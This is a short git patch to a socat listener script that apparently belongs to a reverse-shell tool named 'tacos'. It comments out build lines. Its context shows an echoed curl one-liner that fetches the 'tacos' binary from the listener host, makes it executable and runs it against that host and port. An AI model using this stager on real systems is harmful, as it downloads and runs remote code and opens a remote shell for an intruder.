From c22bbe86977bde5ab5d783d45fd1c9e50214cf27 Mon Sep 17 00:00:00 2001 From: ariary Date: Sun, 27 Feb 2022 17:13:38 -0500 Subject: [PATCH] minor fix for tacos directory --- light-pty4all/socat-listener.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/light-pty4all/socat-listener.sh b/light-pty4all/socat-listener.sh index 24f6f04..6c3a622 100755 --- a/light-pty4all/socat-listener.sh +++ b/light-pty4all/socat-listener.sh @@ -54,8 +54,8 @@ else fi # put tacos in current directory -cd .. && make build.tacos && cd - -mv ../tacos . +# cd .. && make build.tacos && cd - +# mv ../tacos . if [[ "$GITAR" ]]; then echo "curl -O ${LHOST}:9237/pull/tacos -o tacos && chmod +x tacos && ./tacos ${LHOST}:${LPORT}"